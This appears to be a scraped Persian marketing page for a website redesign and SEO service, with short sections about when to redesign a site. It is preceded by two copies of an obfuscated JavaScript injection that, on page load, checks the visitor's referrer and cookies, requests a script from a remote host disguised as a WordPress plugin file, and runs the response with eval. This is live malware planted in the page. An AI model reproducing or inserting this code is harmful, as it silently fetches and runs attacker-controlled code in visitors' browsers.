;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
طراحی مجدد

ما وب سایت های زیبا با طراحی مدرن ایجاد می کنیم صفحات وبی که مرزها را جابجا می کنند

طراحی مجدد وب سایت حرفه ای

اگر وب سایت شما به ظاهر جدید ، خلاق و مدرن نیاز دارد ، طراحی مجدد وب سایت می تواند در دستیابی به این هدف در یک بازه زمانی کوتاه به شما کمک کند. این منجر به ارتقاء رتبه وب سایت شما در سرپ می شود. علاوه بر طراحی مجدد ، شما همچنین بهینه سازی اولیه سئو را بدست می آورید که منجر به افزایش آشکار تعداد بازدیدها و دید در نتایج جستجو می شود.

پولت را پس انداز کن

شانس خود را برای جذب تعداد زیادی از افراد به وب سایت خود تنها با یک سرمایه گذاری در طراحی و عملکردهای جدید آن از دست ندهید. با نپرداختن به روزرسانی ها و نگهداری از وب سایتی که مزایایی برای شما ایجاد نمی کند ، هزینه های خود را پس انداز کنید. یک سرمایه گذاری بزرگ در هویت برند ، یک تغییر بصری که به شما امکان می دهد طراحی مجدد را در 5 تا 10 سال آینده فراموش نکنید.

شما در حال حاضر وب سایتی دارید که کاملاً عادی به نظر می رسد زیرا قبلاً به آن عادت کرده اید ، درست است؟ با این حال ، آیا این اثر مطلوب را ایجاد می کند؟ اگر اینگونه نباشد ، باید به فکر طراحی مجدد آن باشید. در اینجا چند سؤال وجود دارد که باید به آنها ابتدا پاسخ دهید:

  • آیا وب سایت شما مدت ها قبل طراحی شده بود؟
  • آیا از نحوه ظاهر وب سایت در مقایسه با رقیبان خود رضایت ندارید؟
  • آیا مشتریهای آینده شما بعد از دیدن وب سایت شما با شما تماس نمی گیرند؟
  • آیا فکر می کنید تصویر شرکت شما شایسته بهترین طراحی است؟
اگر جواب هر یک از این سؤال ها بله است ، قطعاً وب سایت شما به یک طراحی مجدد و حرفه ای نیاز دارد.
سفارش طراحی مجدد

داشتن یک وب سایت طراحی مجدد و مطابق با آخرین روندها ، تغییرات مثبتی را در تجارت شما آغاز می کند. تیم خلاق ما ابتدا وب سایت موجود شما را تجزیه و تحلیل کرده و سپس با کمک فن آوری ها و روندهای طراحی پیشرفته وب ، آن را با نیازهای روزافزون بازار تطبیق می دهند. خدمات طراحی مجدد را برای وب سایت قدیمی خود سفارش دهید.